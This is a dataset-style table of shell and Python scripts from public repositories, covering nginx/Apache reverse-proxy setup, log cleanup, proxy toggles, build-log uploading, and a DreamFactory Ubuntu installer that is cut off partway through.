blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
bcb643610bfa0c23931451d2de3a4c576d589f0b | Shell | aoggz/nginx-reverse-proxy | /startup.sh | UTF-8 | 1,761 | 3.421875 | 3 | [] | no_license | #!/bin/sh
set -e
# Script adapted from:
# https://myopswork.com/how-to-do-end-to-end-encryption-of-data-in-transit-b-w-aws-alb-and-ec2-3b7fd917cddd
# AND
# https://medium.com/@oliver.zampieri/self-signed-ssl-reverse-proxy-with-docker-dbfc78c05b41
echo "Generating SSL for $DOMAIN"
openssl version
mkdir -p /etc/ssl/private
chmod 700 /etc/ssl/private
cd /etc/ssl/private
echo "Generating key request for $DOMAIN"
openssl req -subj "/C=$COUNTRY/ST=$STATE/L=$LOCALITY/O=$ORGANIZATION/OU=$ORGANIZATIONAL_UNIT/CN=$DOMAIN/emailAddress=$EMAIL_ADDRESS" \
-x509 -newkey rsa:4096 -nodes -keyout key.pem -out cert.pem -days 365
echo "Using proxy address of $PROXY_ADDRESS"
timeout="60"
if [! -z "$TIMEOUT_SECONDS" ]
then
timeout=$TIMEOUT_SECONDS
fi
cat <<EOF > /etc/nginx/nginx.conf
worker_processes 4;
events { worker_connections 1024; }
http {
sendfile on;
upstream app_servers {
server $PROXY_ADDRESS:80;
}
server {
listen 443 ssl;
server_name localhost;
ssl_certificate /etc/ssl/private/cert.pem;
ssl_certificate_key /etc/ssl/private/key.pem;
location / {
proxy_pass http://$PROXY_ADDRESS:80;
proxy_http_version 1.1;
proxy_set_header Upgrade \$http_upgrade;
proxy_set_header Connection keep-alive;
proxy_set_header Host \$host;
proxy_buffer_size 128k;
proxy_buffers 4 256k;
proxy_busy_buffers_size 256k;
proxy_connect_timeout $timeout;
proxy_send_timeout $timeout;
proxy_read_timeout $timeout;
send_timeout $timeout;
}
}
}
EOF
# Start nginx
nginx -g 'daemon off;' | true |
6a72712036f816cc299b3a7f97e7783acaa61e94 | Shell | mudit1993/Practice-Programs | /OS Lab/Assignment1/months.sh | UTF-8 | 104 | 2.671875 | 3 | [] | no_license | echo Enter number of days
read d
m=`expr $d / 30`
da=`expr $d - \( $m \* 30 \)`
echo $m months $da days
| true |
8c19e4b81e38889f0195bab4b005ad0c5f3a5708 | Shell | harleybai/plc | /PLC | UTF-8 | 1,006 | 3.484375 | 3 | [] | no_license | #!/bin/sh /etc/rc.common
# PLC init.sh
# Copyright (C) 2017 Bai Shuangxing
START=10
STOP=15
execname=plc
pid=`ps |grep "$execname"|grep -v grep|wc -l`
start(){
if [ $pid -lt 1 ]; then
$execname >/dev/null&
echo "Starting $execname:[ OK ]"
else
echo "Starting $execname:[ Failed ]"
fi
}
stop(){
if [ $pid -gt 0 ]; then
ps |grep "$execname"|grep -v grep|awk '{print $1}'|xargs kill -9
echo "Stoping $execname:[ OK ]"
else
echo "Stoping $execname:[ Failed ]"
fi
}
restart(){
if [ $pid -gt 0 ]; then
ps |grep "$execname"|grep -v grep|awk '{print $1}'|xargs kill -9
echo "Stoping $execname:[ OK ]"
sleep 1
$execname >/dev/null&
echo "Starting $execname:[ OK ]"
elif [ $pid -eq 0 ]; then
$execname >/dev/null&
echo "Starting $execname:[ OK ]"
else
echo "Restarting $execname:[ Failed ]"
fi
}
status(){
if [ $pid -eq 0 ]; then
echo "$execname is not running"
else
echo "$execname is running"
fi
}
| true |
80ee611a722b7e64ce2446cd9811f02266866751 | Shell | tribeiros/scripts | /uspeedy.sh | UTF-8 | 541 | 3.59375 | 4 | [] | no_license | #!/bin/bash
# remove log from uspeedy
# tribeiros@indracompany.com - 07/2018
# Path to clean
dirR='/home/tribeiros/Projects/scripts/rmlogr'
dirS='/home/tribeiros/Projects/scripts/rmlogs'
# argument for mtime
days=+7
# plus sign indicate to verify files after a number of days, minus sign to before
# verify directory and execute rm
if [ -d $dirR ] && [ -d $dirS ];then
for filesR in `find $dirR/* -mtime $days`
do
rm -rf $filesR
done
for filesS in `find $dirS/* -mtime $days`
do
rm -rf $filesS
done
else
echo 'Directory not found'
fi
| true |
5c011a2739794ff1aca64a21b108730d40809fa4 | Shell | TerenceLiu98/server-and-openstack | /script/autoproxy.sh | UTF-8 | 641 | 3.109375 | 3 | [] | no_license | #/bin/bash
brew install privoxy
echo -n "<- Enter your http/https PORT ->"
read PORT
echo "PORT = $PORT"
echo "function proxy_off(){" >> ~/.bash_profile
echo " unset http_proxy" >> ~/.bash_profile
echo " unset https_proxy" >> ~/.bash_profile
echo " echo -e "已关闭代理"" ~/.bash_profile
echo "}\n" >> ~/.bash_profile
echo "function proxy_on() {" >> ~/.bash_profile
echo " export http_proxy='http://localhost:$PORT'" >> ~/.bash_profile
echo " export https_proxy='http://localhost:$PORT'" >> ~/.bash_profile
echo " echo -e "已开启代理"" >> ~/.bash_profile
echo "}" >> ~/.bash_profile
echo -n "done"
| true |
21360cb599b38667abb1197b012ae7143b1ff81c | Shell | roxor05/Programs | /Basic Bash scripting/case.sh | UTF-8 | 164 | 3.1875 | 3 | [] | no_license | #! /bin/bash
vehicle=$1
case $vehicle in
"cars" )
echo "car is just fine";;
"bikes" )
echo "bikes are better";;
* )
echo "not the correct option";;
esac | true |
f83d382aa6956f6daa38ee80912fdcdb9470bf5b | Shell | rcarreon/robc_main | /modules/varnish/files/pxy2app_connchk.sh | UTF-8 | 2,013 | 3.640625 | 4 | [] | no_license | #!/bin/bash
#
# /etc/cron.hourly/pxy2app_connchk.sh
# Dairenn Lombard <dairenn.lombard@gorillanation.com>
#
# 2011-07-28: Filter out localhost TCP:80
# 2011-07-27: Post IP addresses in the correct order.
# 2011-07-19: Initial Release
PATH=/usr/local/bin:/usr/local/sbin:/sbin:/bin:/usr/bin
#set -e
# Config options:
# Enable logging
enablelog="1"
# Run in "debug" mode
debug="0"
# Set URL of VIP Visualizer
targeturl="http://vipvisual.gnmedia.net"
######################
# #
# END CONFIG OPTIONS #
# #
######################
logdir="/var/log"
logfile="pxy_to_app.log"
logpath="$logdir/$logfile"
# Only an educated guess.
myip=`ifconfig eth0 | grep "inet addr" | cut -d ":" -f 2 | awk '{print $1}'`
if [ "$debug" = "1" ] ; then
port="8080"
echo ; echo "My IP address is $myip"
echo ; echo "My target URL is $targeturl:$port" ; echo
else
port="80"
fi
# 87.238.37.6 resolves to odd.varnish-software.com and varnish sometimes phones
# home for some reason.
for connection_ip in `netstat -an | egrep "(*WAIT|SYN*|ESTABLISHED)" | awk '{print $5}' | grep ":80$" | egrep -v "(127.0.0.1|87.238.37.6)" | cut -d ":" -f 1 | sort -n | uniq`
do
conns=`netstat -an | grep $connection_ip | egrep "(*WAIT|SYN*|ESTABLISHED)" | wc -l`
curlarg="$targeturl:$port/insertNode?pxy_ip=$myip&app_ip=$connection_ip&conns=$conns&nodetype=pxy"
curtime=`date "+%Y-%m-%d %H:%M:%S"`
stamp="[$curtime]:"
if [ "$enablelog" = "1" ] ; then
# No out of control, abandoned log files; only keep what we need.
if [ -f "$logpath" ] ; then
find $logpath -name "$logfile" -ctime +1 -exec rm -f {} \;
fi
echo -n "$stamp Transmitted HTTP Request: $curlarg with output from curl: " >> $logpath
VERBAGE=$( { curl "$curlarg"; } 2>&1 )
echo $VERBAGE >> $logpath
if [ "$debug" = "1" ] ; then
tail -1 $logpath
fi
else
# If not logging, just do this:
if [ "$debug" = "1" ] ; then
curl -v "$curlarg"
else
curl "$curlarg"
fi
fi
done
if [ "$debug" = "1" ] ; then
echo ; echo "Done." ; echo
fi
exit $?
| true |
3e5f37f6d01c14828c1f18f954941759ac5f7537 | Shell | lucaswannen/source_code_classification_with_CNN | /dataset_v2/bash/11709222.txt | UTF-8 | 259 | 2.6875 | 3 | [] | no_license | #!/bin/bash
set -o nounset
set -o errexit
for path in `cat list.txt`; do
git add "$path"
git commit -am "autocommit"
done
.
~/bcg/credentials.txt
~/bcg/credentials.txt
fatal: pathspec 'bcg/versioned/~/bcg/credentials.txt' did not match any files
| true |
6e14753121c3965accd3a96092b59a1f735bebe2 | Shell | tiagompribeiro/scripts_util | /pcapreplay | UTF-8 | 580 | 3.34375 | 3 | [] | no_license | #!/bin/bash
# Run on sudo su ROOT needed
# como correr ???? tcpreplay
#
# -k option will preload the PCAP file into memory before testing
# -t option will send as quickly as possible
# --loop to add a loop not implemented
helpFunction()
{
echo ""
echo "Usage: pcapreplay path_to_pcap eth_interface"
echo ""
exit 1 # Exit script after printing help
}
# Print helpFunction in case parameters are empty
if [ -z "$1" ] || [ -z "$2" ]
then
echo "";
echo "Some or all of the parameters are empty";
helpFunction
fi
sudo tcpreplay -i $2 -tK $1
#echo "1234567890"
| true |
446d89096e4be24cef58827e0218b522c1ee2755 | Shell | cms-sw/cms-bot | /logUpdater.py | UTF-8 | 7,001 | 2.703125 | 3 | [] | no_license | #!/bin/bash
""":"
python_cmd="python3"
python -V >/dev/null 2>&1 && python_cmd="python"
exec ${python_cmd} $0 ${1+"$@"}
"""
from __future__ import print_function
import os
from os.path import dirname, abspath, join
from cmsutils import doCmd, getIBReleaseInfo
from time import sleep
SCRIPT_DIR=dirname(abspath(__file__))
class LogUpdater(object):
def __init__(self, dirIn=None, dryRun=False, remote=None, webDir="/data/sdt/buildlogs/"):
if not remote:
with open(join(SCRIPT_DIR,"cmssdt.sh")) as ref:
remote = "cmsbuild@"+[ line.split("=")[-1].strip() for line in ref.readlines() if "CMSSDT_SERVER=" in line][0]
self.dryRun = dryRun
self.remote = remote
self.cmsswBuildDir = dirIn
rel = os.path.basename(dirIn)
self.release = rel
rc, day, hour = getIBReleaseInfo(rel)
self.webTargetDir = webDir + "/" + os.environ[
"SCRAM_ARCH"] + "/www/" + day + "/" + rc + "-" + day + "-" + hour + "/" + self.release
self.ssh_opt = "-o CheckHostIP=no -o ConnectTimeout=60 -o ConnectionAttempts=5 -o StrictHostKeyChecking=no -o BatchMode=yes -o PasswordAuthentication=no"
return
def updateUnitTestLogs(self, subdir=""):
print("\n--> going to copy unit test logs to", self.webTargetDir, '... \n')
# copy back the test and relval logs to the install area
# check size first ... sometimes the log _grows_ to tens of GB !!
testLogs = ['unitTestLogs.zip', 'unitTests-summary.log', 'unitTestResults.pkl', 'unitTests1.log']
for tl in testLogs:
self.copyLogs(tl, '.', self.webTargetDir + "/" + subdir)
return
def updateGeomTestLogs(self):
print("\n--> going to copy Geom test logs to", self.webTargetDir, '... \n')
testLogs = ['dddreport.log', 'domcount.log']
for tl in testLogs:
self.copyLogs(tl, '.', self.webTargetDir)
self.copyLogs(tl, '.', os.path.join(self.webTargetDir, 'testLogs'))
return
def updateDupDictTestLogs(self):
print("\n--> going to copy dup dict test logs to", self.webTargetDir, '... \n')
testLogs = ['dupDict-*.log']
for tl in testLogs:
self.copyLogs(tl, '.', self.webTargetDir)
self.copyLogs(tl, '.', os.path.join(self.webTargetDir, 'testLogs'))
return
def updateLogFile(self, fileIn, subTrgDir=None):
desdir = self.webTargetDir
if subTrgDir: desdir = os.path.join(desdir, subTrgDir)
print("\n--> going to copy " + fileIn + " log to ", desdir, '... \n')
self.copyLogs(fileIn, '.', desdir)
return
def updateCodeRulesCheckerLogs(self):
print("\n--> going to copy cms code rules logs to", self.webTargetDir, '... \n')
self.copyLogs('codeRules', '.', self.webTargetDir)
return
def updateRelValMatrixPartialLogs(self, partialSubDir, dirToSend):
destination = os.path.join(self.webTargetDir, 'pyRelValPartialLogs')
print("\n--> going to copy pyrelval partial matrix logs to", destination, '... \n')
self.copyLogs(dirToSend, partialSubDir, destination)
self.runRemoteCmd("touch " + os.path.join(destination, dirToSend, "wf.done"))
return
def getDoneRelvals(self):
wfDoneFile = "wf.done"
destination = os.path.join(self.webTargetDir, 'pyRelValPartialLogs', "*", wfDoneFile)
code, out = self.runRemoteCmd("ls " + destination, debug=False)
return [ wf.split("/")[-2].split("_")[0] for wf in out.split("\n") if wf.endswith(wfDoneFile)]
def relvalAlreadyDone(self, wf):
wfDoneFile = "wf.done"
destination = os.path.join(self.webTargetDir, 'pyRelValPartialLogs', str(wf) + "_*", wfDoneFile)
code, out = self.runRemoteCmd("ls -d " + destination)
return ((code == 0) and out.endswith(wfDoneFile))
def updateAddOnTestsLogs(self):
print("\n--> going to copy addOn logs to", self.webTargetDir, '... \n')
self.copyLogs('addOnTests.log', '.', self.webTargetDir)
self.copyLogs('addOnTests.zip', 'addOnTests/logs', self.webTargetDir)
self.copyLogs('addOnTests.pkl', 'addOnTests/logs', os.path.join(self.webTargetDir, 'addOnTests/logs'))
return
def updateIgnominyLogs(self):
print("\n--> going to copy ignominy logs to", self.webTargetDir, '... \n')
testLogs = ['dependencies.txt.gz', 'products.txt.gz', 'logwarnings.gz', 'metrics']
for tl in testLogs:
self.copyLogs(tl, 'igRun', os.path.join(self.webTargetDir, 'igRun'))
return
def updateProductionRelValLogs(self, workFlows):
print("\n--> going to copy Production RelVals logs to", self.webTargetDir, '... \n')
wwwProdDir = os.path.join(self.webTargetDir, 'prodRelVal')
self.copyLogs('prodRelVal.log', '.', wwwProdDir)
for wf in workFlows:
self.copyLogs('timingInfo.txt', 'prodRelVal/wf/' + wf, os.path.join(wwwProdDir, 'wf', wf))
return
def updateBuildSetLogs(self, appType='fwlite'):
print("\n--> going to copy BuildSet logs to", self.webTargetDir, '... \n')
wwwBSDir = os.path.join(self.webTargetDir, 'BuildSet')
self.copyLogs(appType, 'BuildSet', wwwBSDir)
return
def copyLogs(self, what, logSubDir="", tgtDirIn=None):
if not tgtDirIn: tgtDirIn = self.webTargetDir
self.runRemoteCmd("mkdir -p " + tgtDirIn)
self.copy2Remote(os.path.join(self.cmsswBuildDir, logSubDir, what), tgtDirIn + "/")
def runRemoteCmd(self, cmd, debug=True):
return self.runRemoteHostCmd(cmd, self.remote, debug=debug)
def copy2Remote(self, src, des):
return self.copy2RemoteHost(src, des, self.remote)
def runRemoteHostCmd(self, cmd, host, debug=True):
cmd = "ssh -Y " + self.ssh_opt + " " + host + " 'echo CONNECTION=OK && " + cmd + "'"
try:
if self.dryRun:
print("CMD>>", cmd)
else:
for i in range(10):
err, out = doCmd(cmd, debug=debug)
if not err: return (err, out)
for l in out.split("\n"):
if "CONNECTION=OK" in l: return (err, out)
sleep(60)
return doCmd(cmd, debug=debug)
except Exception as e:
print("Ignoring exception during runRemoteCmd:", str(e))
return (1, str(e))
def copy2RemoteHost(self, src, des, host):
cmd = "scp " + self.ssh_opt + " -r " + src + " " + host + ":" + des
try:
if self.dryRun:
print("CMD>>", cmd)
else:
for i in range(10):
err, out = doCmd(cmd)
if not err: return (err, out)
sleep(60)
return doCmd(cmd)
except Exception as e:
print("Ignoring exception during copy2Remote:", str(e))
return (1, str(e))
| true |
e3be33c13d6a0750cc52d07cda568fcfa2ac8387 | Shell | walm/dotfiles | /exports | UTF-8 | 694 | 2.546875 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# environment
export EDITOR="nvim"
export TERMINAL="urxvt"
export BROWSER="firefox-developer-edition"
# history
# remove duplicates from history
export HISTCONTROL=erasedups
# keep a lot in history
export HISTSIZE=50000
# commands to not show in history
export HISTIGNORE=" *:ls:cd:cd -:pwd:exit:date:* --help:* -h"
# locale
export LANG="en_US.UTF-8"
export LC_ALL="en_US.UTF-8"
# don’t clear the screen after man
export MANPAGER="less -X"
# gtk hidpi
if [[ -n "$RETINA" ]]; then
export GDK_SCALE=2
export GDK_DPI_SCALE=0.5
export QT_DEVICE_PIXEL_RATIO=2
fi
# clipmenu use rofi
export CM_LAUNCHER=rofi
# go vendoring
export GO15VENDOREXPERIMENT=1
export GOMAXPROCS=1
| true |
b5ea6deb66818dc07669875a488fc06e63c90ceb | Shell | sunlibo111111/dreamfactory | /installers/ubuntu.sh | UTF-8 | 35,776 | 4.03125 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# Colors schemes for echo:
RD='\033[0;31m' #Red
GN='\033[0;32m' #Green
MG='\033[0;95m' #Magenta
NC='\033[0m' # No Color
DEFAULT_PHP_VERSION="php7.2"
CURRENT_OS=$(cat /etc/os-release | grep VERSION_ID | cut -d "=" -f 2 | cut -c 2-3)
ERROR_STRING="Installation error. Exiting"
CURRENT_PATH=$(pwd)
# CHECK FOR KEYS
while [[ -n $1 ]]
do
case "$1" in
--with-oracle) ORACLE=TRUE;;
--with-mysql) MYSQL=TRUE;;
--with-apache) APACHE=TRUE;;
--with-db2) DB2=TRUE;;
--with-cassandra) CASSANDRA=TRUE;;
--debug) DEBUG=TRUE;;
--help) HELP=TRUE;;
-h) HELP=TRUE;;
*) echo -e "\n${RD}Invalid flag detected… aborting.${NC}"
HELP=TRUE
break;;
esac
shift
done
if [[ $HELP == TRUE ]]
then
echo -e "\nList of available keys:\n"
echo " --with-oracle Install driver and PHP extensions for work with Oracle DB"
echo " --with-mysql Install MariaDB as default system database for DreamFactory"
echo " --with-apache Install Apache2 web server for DreamFactory"
echo " --with-db2 Install driver and PHP extensions for work with IBM DB2"
echo " --with-cassandra Install driver and PHP extensions for work with Cassandra DB"
echo " --debug Enable installation process logging to file in /tmp folder."
echo -e " -h, --help Show this help\n"
exit 1
fi
if [[ ! $DEBUG == TRUE ]]
then
exec 5>&1 # Save a copy of STDOUT
exec > /dev/null 2>&1 # Redirect STDOUT to Null
else
exec 5>&1 # Save a copy of STDOUT. Used because all echo redirects output to 5.
exec > /tmp/dreamfactory_installer.log 2>&1
fi
clear >&5
# Make sure script run as sudo
if (( $EUID != 0 ));
then
echo -e "${RD}\nPlease run script with sudo: sudo bash $0 \n${NC}" >&5
exit 1
fi
# Retrieve executing user's username
CURRENT_USER=$(logname)
if [[ -z $SUDO_USER ]] && [[ -z $CURRENT_USER ]]
then
echo -e "${RD} Enter username for installation DreamFactory:${NC}" >&5
read CURRENT_USER
fi
if [[ ! -z $SUDO_USER ]]
then
CURRENT_USER=${SUDO_USER}
fi
### STEP 1. Install system dependencies
echo -e "${GN}Step 1: Installing system dependencies...\n${NC}" >&5
apt-get update
apt-get install -y git \
curl \
zip \
unzip \
ca-certificates \
apt-transport-https \
software-properties-common \
lsof \
libmcrypt-dev \
libreadline-dev
# Check installation status
if (( $? >= 1 ))
then
echo -e "${RD}\n${ERROR_STRING}${NC}" >&5
exit 1
fi
echo -e "${GN}The system dependencies have been successfully installed.\n${NC}" >&5
### Step 2. Install PHP
echo -e "${GN}Step 2: Installing PHP...\n${NC}" >&5
PHP_VERSION=$(php --version 2> /dev/null | head -n 1 | cut -d " " -f 2 | cut -c 1,3 )
MCRYPT=0
if [[ $PHP_VERSION =~ ^-?[0-9]+$ ]]
then
if (( $PHP_VERSION == 71 ))
then
PHP_VERSION=php7.1
MCRYPT=1
else
PHP_VERSION=${DEFAULT_PHP_VERSION}
fi
else
PHP_VERSION=${DEFAULT_PHP_VERSION}
fi
PHP_VERSION_INDEX=$(echo $PHP_VERSION | cut -c 4-6)
# Install the php repository
add-apt-repository ppa:ondrej/php -y
# Update the system
apt-get update
apt-get install -y ${PHP_VERSION}-common \
${PHP_VERSION}-xml \
${PHP_VERSION}-cli \
${PHP_VERSION}-curl \
${PHP_VERSION}-json \
${PHP_VERSION}-mysqlnd \
${PHP_VERSION}-sqlite \
${PHP_VERSION}-soap \
${PHP_VERSION}-mbstring \
${PHP_VERSION}-zip \
${PHP_VERSION}-bcmath \
${PHP_VERSION}-dev \
${PHP_VERSION}-ldap \
${PHP_VERSION}-pgsql \
${PHP_VERSION}-interbase \
${PHP_VERSION}-sybase
if (( $? >= 1 ))
then
echo -e "${RD}\n${ERROR_STRING}${NC}" >&5
exit 1
fi
echo -e "${GN}${PHP_VERSION} installed.\n${NC}" >&5
### Step 3. Install Apache
if [[ $APACHE == TRUE ]] ### Only with key --apache
then
echo -e "${GN}Step 3: Installing Apache...\n${NC}" >&5
# Check Apache installation status
ps aux | grep -v grep | grep apache2
CHECK_APACHE_PROCESS=$(echo $?)
dpkg -l | grep apache2 | cut -d " " -f 3 | grep -E "apache2$"
CHECK_APACHE_INSTALLATION=$(echo $?)
if (( $CHECK_APACHE_PROCESS == 0 )) || (( $CHECK_APACHE_INSTALLATION == 0 ))
then
echo -e "${RD}Apache2 detected. Skipping installation. Configure Apache2 manually.\n${NC}" >&5
else
# Install Apache
# Check if running web server on port 80
lsof -i :80 | grep LISTEN
if (( $? == 0 ))
then
echo -e "${RD}Port 80 taken.\n ${NC}" >&5
echo -e "${RD}Skipping installation Apache2. Install Apache2 manually.\n ${NC}" >&5
else
apt-get -qq install -y apache2 libapache2-mod-${PHP_VERSION}
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install Apache. Exiting.${NC}" >&5
exit 1
fi
a2enmod rewrite
echo "extension=pdo_sqlsrv.so" >> /etc/php/${PHP_VERSION_INDEX}/apache2/conf.d/30-pdo_sqlsrv.ini
echo "extension=sqlsrv.so" >> /etc/php/${PHP_VERSION_INDEX}/apache2/conf.d/20-sqlsrv.ini
# Create apache2 site entry
WEB_PATH=/etc/apache2/sites-available/000-default.conf
echo '<VirtualHost *:80>' > $WEB_PATH
echo 'DocumentRoot /opt/dreamfactory/public' >> $WEB_PATH
echo '<Directory /opt/dreamfactory/public>' >> $WEB_PATH
echo 'AddOutputFilterByType DEFLATE text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript' >> $WEB_PATH
echo 'Options -Indexes +FollowSymLinks -MultiViews' >> $WEB_PATH
echo 'AllowOverride All' >> $WEB_PATH
echo 'AllowOverride None' >> $WEB_PATH
echo 'Require all granted' >> $WEB_PATH
echo 'RewriteEngine on' >> $WEB_PATH
echo 'RewriteBase /' >> $WEB_PATH
echo 'RewriteCond %{REQUEST_FILENAME} !-f' >> $WEB_PATH
echo 'RewriteCond %{REQUEST_FILENAME} !-d' >> $WEB_PATH
echo 'RewriteRule ^.*$ /index.php [L]' >> $WEB_PATH
echo '<LimitExcept GET HEAD PUT DELETE PATCH POST>' >> $WEB_PATH
echo 'Allow from all' >> $WEB_PATH
echo '</LimitExcept>' >> $WEB_PATH
echo '</Directory>' >> $WEB_PATH
echo '</VirtualHost>' >> $WEB_PATH
service apache2 restart
echo -e "${GN}Apache2 installed.\n${NC}" >&5
fi
fi
else
echo -e "${GN}Step 3: Installing Nginx...\n${NC}" >&5 ### Default choice
# Check nginx installation in the system
ps aux | grep -v grep | grep nginx
CHECK_NGINX_PROCESS=$(echo $?)
dpkg -l | grep nginx | cut -d " " -f 3 | grep -E "nginx$"
CHECK_NGINX_INSTALLATION=$(echo $?)
if (( $CHECK_NGINX_PROCESS == 0 )) || (( $CHECK_NGINX_INSTALLATION == 0 ))
then
echo -e "${RD}Nginx detected. Skipping installation. Configure Nginx manually.\n${NC}" >&5
else
# Install nginx
# Checking running web server
lsof -i :80 | grep LISTEN
if (( $? == 0 ))
then
echo -e "${RD}Port 80 taken.\n ${NC}" >&5
echo -e "${RD}Skipping Nginx installation. Install Nginx manually.\n ${NC}" >&5
else
apt-get install -y nginx ${PHP_VERSION}-fpm
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install Nginx. Exiting.${NC}" >&5
exit 1
fi
# Change php fpm configuration file
sed -i 's/\;cgi\.fix\_pathinfo\=1/cgi\.fix\_pathinfo\=0/' $(php -i|sed -n '/^Loaded Configuration File => /{s:^.*> ::;p;}'| sed 's/cli/fpm/')
# Create nginx site entry
WEB_PATH=/etc/nginx/sites-available/default
echo 'server {' > $WEB_PATH
echo 'listen 80 default_server;' >> $WEB_PATH
echo 'listen [::]:80 default_server ipv6only=on;' >> $WEB_PATH
echo 'root /opt/dreamfactory/public;' >> $WEB_PATH
echo 'index index.php index.html index.htm;' >> $WEB_PATH
echo 'server_name server_domain_name_or_IP;' >> $WEB_PATH
echo 'gzip on;' >> $WEB_PATH
echo 'gzip_disable "msie6";' >> $WEB_PATH
echo 'gzip_vary on;' >> $WEB_PATH
echo 'gzip_proxied any;' >> $WEB_PATH
echo 'gzip_comp_level 6;' >> $WEB_PATH
echo 'gzip_buffers 16 8k;' >> $WEB_PATH
echo 'gzip_http_version 1.1;' >> $WEB_PATH
echo 'gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;' >> $WEB_PATH
echo 'location / {' >> $WEB_PATH
echo 'try_files $uri $uri/ /index.php?$args;}' >> $WEB_PATH
echo 'error_page 404 /404.html;' >> $WEB_PATH
echo 'error_page 500 502 503 504 /50x.html;' >> $WEB_PATH
echo 'location = /50x.html {' >> $WEB_PATH
echo 'root /usr/share/nginx/html;}' >> $WEB_PATH
echo 'location ~ \.php$ {' >> $WEB_PATH
echo 'try_files $uri =404;' >> $WEB_PATH
echo 'fastcgi_split_path_info ^(.+\.php)(/.+)$;' >> $WEB_PATH
echo "fastcgi_pass unix:/var/run/php/${PHP_VERSION}-fpm.sock;" >> $WEB_PATH
echo 'fastcgi_index index.php;' >> $WEB_PATH
echo 'fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;' >> $WEB_PATH
echo 'include fastcgi_params;}}' >> $WEB_PATH
service ${PHP_VERSION}-fpm restart && service nginx restart
echo -e "${GN}Nginx installed.\n${NC}" >&5
fi
fi
fi
### Step 4. Configure PHP development tools
echo -e "${GN}Step 4: Configuring PHP Extensions...\n${NC}" >&5
apt-get install -y php-pear
if (( $? >= 1 ))
then
echo -e "${RD}\n${ERROR_STRING}${NC}">&5
exit 1
fi
pecl channel-update pecl.php.net
### Install MCrypt
php -m | grep -E "^mcrypt"
if (( $? >= 1 ))
then
if [[ $MCRYPT == 0 ]]
then
printf "\n" | pecl install mcrypt-1.0.1
if (( $? >= 1 ))
then
echo -e "${RD}\nMcrypt extension installation error.${NC}" >&5
exit 1
fi
echo "extension=mcrypt.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/mcrypt.ini
phpenmod -s ALL mcrypt
else
apt-get install ${PHP_VERSION}-mcrypt
fi
php -m | grep -E "^mcrypt"
if (( $? >= 1 ))
then
echo -e "${RD}\nMcrypt installation error.${NC}" >&5
fi
fi
### Install MongoDB drivers
php -m | grep -E "^mongodb"
if (( $? >= 1 ))
then
pecl install mongodb
if (( $? >= 1 ))
then
echo -e "${RD}\nMongo DB extension installation error.${NC}" >&5
exit 1
fi
echo "extension=mongodb.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/mongodb.ini
phpenmod -s ALL mongodb
php -m | grep -E "^mongodb"
if (( $? >= 1 ))
then
echo -e "${RD}\nMongoDB installation error.${NC}" >&5
fi
fi
### Install MS SQL Drivers
php -m | grep -E "^sqlsrv"
if (( $? >= 1 ))
then
curl https://packages.microsoft.com/keys/microsoft.asc | apt-key add -
if (( $CURRENT_OS == 16 ))
then
curl https://packages.microsoft.com/config/ubuntu/16.04/prod.list > /etc/apt/sources.list.d/mssql-release.list
elif (( $CURRENT_OS == 18 ))
then
curl https://packages.microsoft.com/config/ubuntu/18.04/prod.list > /etc/apt/sources.list.d/mssql-release.list
else
echo -e "${RD} The script support only Ubuntu 16 and 18 versions. Exit.\n ${NC}">&5
exit 1
fi
apt-get update
ACCEPT_EULA=Y apt-get install -y msodbcsql17 mssql-tools unixodbc-dev
pecl install sqlsrv
if (( $? >= 1 ))
then
echo -e "${RD}\nMS SQL Server extension installation error.${NC}" >&5
exit 1
fi
echo "extension=sqlsrv.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/sqlsrv.ini
phpenmod -s ALL sqlsrv
php -m | grep -E "^sqlsrv"
if (( $? >= 1 ))
then
echo -e "${RD}\nMS SQL Server extension installation error.${NC}" >&5
fi
fi
### DRIVERS FOR MSSQL (pdo_sqlsrv)
php -m | grep -E "^pdo_sqlsrv"
if (( $? >= 1 ))
then
pecl install pdo_sqlsrv
if (( $? >= 1 ))
then
echo -e "${RD}\npdo_sqlsrv extension installation error.${NC}" >&5
exit 1
fi
echo "extension=pdo_sqlsrv.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/pdo_sqlsrv.ini
phpenmod -s ALL pdo_sqlsrv
php -m | grep -E "^pdo_sqlsrv"
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install pdo_sqlsrv extension${NC}" >&5
fi
fi
### DRIVERS FOR ORACLE ( ONLY WITH KEY --with-oracle )
php -m | grep -E "^oci8"
if (( $? >= 1 ))
then
if [[ $ORACLE == TRUE ]]
then
echo -e "${MG}Enter path to the Oracle drivers: [./]${NC} " >&5
read DRIVERS_PATH
if [[ -z $DRIVERS_PATH ]]
then
DRIVERS_PATH="."
fi
unzip "$DRIVERS_PATH/instantclient-*.zip" -d /opt/oracle
if (( $? == 0 ))
then
echo -e "${GN}Drivers found.\n${NC}" >&5
apt install -y libaio1
echo "/opt/oracle/instantclient_18_3" > /etc/ld.so.conf.d/oracle-instantclient.conf
ldconfig
printf "instantclient,/opt/oracle/instantclient_18_3\n" | pecl install oci8
if (( $? >= 1 ))
then
echo -e "${RD}\nOracle instant client installation error${NC}" >&5
exit 1
fi
echo "extension=oci8.so" > /etc/php/${PHP_VERSION_INDEX}/mods-available/oci8.ini
phpenmod -s ALL oci8
php -m | grep oci8
if (( $? >= 1 ))
then
echo -e "${RD}\nCould not install oci8 extension.${NC}" >&5
fi
else
echo -e "${RD}Drivers not found. Skipping...\n${NC}" >&5
fi
unset DRIVERS_PATH
fi
fi
### DRIVERS FOR IBM DB2 PDO ( ONLY WITH KEY --with-db2 )
php -m | grep -E "^pdo_ibm"
if (( $? >= 1 ))
then
if [[ $DB2 == TRUE ]]
then
echo -e "${MG}Enter path to the IBM DB2 drivers: [./]${NC} " >&5
